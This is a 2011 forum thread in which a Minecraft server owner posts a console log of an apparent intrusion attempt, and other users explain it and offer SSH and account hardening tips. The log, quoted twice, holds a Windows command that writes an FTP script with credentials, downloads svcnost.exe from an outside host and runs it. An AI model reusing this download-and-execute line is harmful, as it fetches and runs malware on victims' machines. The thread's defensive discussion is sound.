Jump to content

  • Curse Sites
Become a Premium Member! Help
Latest News Article

Kiddy Script attempt


  • Please log in to reply
4 replies to this topic

#1

Neko22
    Neko22

    Out of the Water

  • Members
  • 2 posts

Posted 22 March 2011 - 07:19 PM

Hey guys,
Sorry I did try looking for a similar post but I couldn't find anything.
I run a small private linux server on my Acer Revo R3700 (ace little thing btw!), with CraftBukkit installed and the Dynmap plugin running. Just got back recently and noticed this little gem on my minecraft command prompt logs:

>
17:28:06 [INFO] Unknown console command. Type "help" for help.
>7~
17:28:10 [INFO] Unknown console command. Type "help" for help.
>
17:28:13 [INFO] Unknown console command. Type "help" for help.
>cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
17:28:38 [INFO] Unknown console command. Type "help" for help.
>echo You got owned
17:28:42 [INFO] Unknown console command. Type "help" for help.
>
17:28:44 [INFO] Unknown console command. Type "help" for help.

Now, I'm quite new at linux (only been playing around with it for a couple of weeks now), but I googled it and found out that they were attempting to FTP up a dodgy file, but I really have two questions?

1) Will this have done any damage to my server? I'm not running FTP or anything, so I'm 99% sure this did nothing as it was run inside minecraft, but if they managed to get into here, they must have been able to hijack my user surely?
2) Does anyone have an idea how they got in in the first place, and how I can stop them doing so again?

Ive closed down several of the ports that I think might have had a part to play in it (an external SSH port and a couple others), but if anyone has any advice I am all ears, so to speak.

If anyone needs more info from me, I will be happy to provide.

Cheers guys, and oh! First Post!
- Neko22

Register or log in to remove.

#2

endofzero

Posted 22 March 2011 - 09:56 PM

Neko22 said:

Hey guys,
Sorry I did try looking for a similar post but I couldn't find anything.
I run a small private linux server on my Acer Revo R3700 (ace little thing btw!), with CraftBukkit installed and the Dynmap plugin running. Just got back recently and noticed this little gem on my minecraft command prompt logs:

>
17:28:06 [INFO] Unknown console command. Type "help" for help.
>7~
17:28:10 [INFO] Unknown console command. Type "help" for help.
>
17:28:13 [INFO] Unknown console command. Type "help" for help.
>cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
17:28:38 [INFO] Unknown console command. Type "help" for help.
>echo You got owned
17:28:42 [INFO] Unknown console command. Type "help" for help.
>
17:28:44 [INFO] Unknown console command. Type "help" for help.

Now, I'm quite new at linux (only been playing around with it for a couple of weeks now), but I googled it and found out that they were attempting to FTP up a dodgy file, but I really have two questions?

1) Will this have done any damage to my server? I'm not running FTP or anything, so I'm 99% sure this did nothing as it was run inside minecraft, but if they managed to get into here, they must have been able to hijack my user surely?
2) Does anyone have an idea how they got in in the first place, and how I can stop them doing so again?

Ive closed down several of the ports that I think might have had a part to play in it (an external SSH port and a couple others), but if anyone has any advice I am all ears, so to speak.

If anyone needs more info from me, I will be happy to provide.

Cheers guys, and oh! First Post!
- Neko22

The good: That was a windows attack... so it wouldn't have an affect on your linux box. (but the FTP command will work even if you don't have an ftp server running, it's just a transfer protocol. So IF it worked, the files would have still gotten through)

However, I would suggest you take a look at your logs.

Where did you see that? When you opened your console, or in server.log?

If it's in the console, you need to take some steps to protect yourself.

0) DON'T use the root account to run minecraft.

1) For fuck's sake... DISABLE ROOT LOGIN for SSH if not already done. If you really need root, you can use 'su' from your user account.

2) Disable all non-used user accounts, and create very secure passwords for the ones that remain open, lest you find them broken into using a standard brute force attack.

3) You can keep SSH, but I highly recommend changing the port to something other than any commonly used port... 14242, or some shit. just be sure you are using the '-p ' flag when sshing into your box from a term. This will help deter automated scripts that get a hold of your IP from running brute force attacks on your server.

4) Verify if you are being attacked by looking at your logs... In Debian and like flavors, you can find them in /var/log/
You can do a few things here... actively tail your auth.log file via 'tail -f auth.log' or you can throw the last few thousand lines into another file so you can take a gander: 'tail -n 2500 auth.log >> ~/access_log.txt'
MC Sheller - Automated Shell Script git - MC Log Parser - Hub

Lulz

MoonBeans said:

As far as I've heard, Sk89q is a virus. Not sure though!

#3

thezlog
    thezlog

    Tree Puncher

  • Members
  • 24 posts

Posted 22 March 2011 - 11:01 PM

I'm not gonna lie, you make it sound like Minecraft would let some one force feed files via FTP onto windows machines... and if that's the case I am gonna be waiting for Notch to make a post about how he is going to attempt to prevent it...

#4

endofzero

Posted 23 March 2011 - 12:06 AM

thezlog said:

I'm not gonna lie, you make it sound like Minecraft would let some one force feed files via FTP onto windows machines... and if that's the case I am gonna be waiting for Notch to make a post about how he is going to attempt to prevent it...

Well... that's not true... the code was probably sent via automation.... if you look at that command, you can see it uses 'cmd' which means it is probably try to start it using the 'Run...' command of windows... His information is limited, so we don't know how he found that info on his server. None of those commands would ever work from the Mincraft console as it's just not designed that way...

hence all of the "[INFO] Unknown console command. Type "help" for help." shit.

Given his description, that may have occurred because he just didn't secure his server correctly and someone brute forced his system to get in. THIS is why people that think they can just start up a server get so fucked over when they start advertising their IP to the world.

You are freaking out from basic lack of knowledge in that area, just stop...
MC Sheller - Automated Shell Script git - MC Log Parser - Hub

Lulz

MoonBeans said:

As far as I've heard, Sk89q is a virus. Not sure though!

#5

Neko22
    Neko22

    Out of the Water

  • Members
  • 2 posts

Posted 23 March 2011 - 10:09 PM

Thanks guys for your help, I've done all the things you suggested so I think I'm a little bit safer now.
I couldn't see anything in the logs per-say, but I no doubt missed something. In any case I think the hole is closed now.

I'm think I'm going to go read up some more now... :iapprove: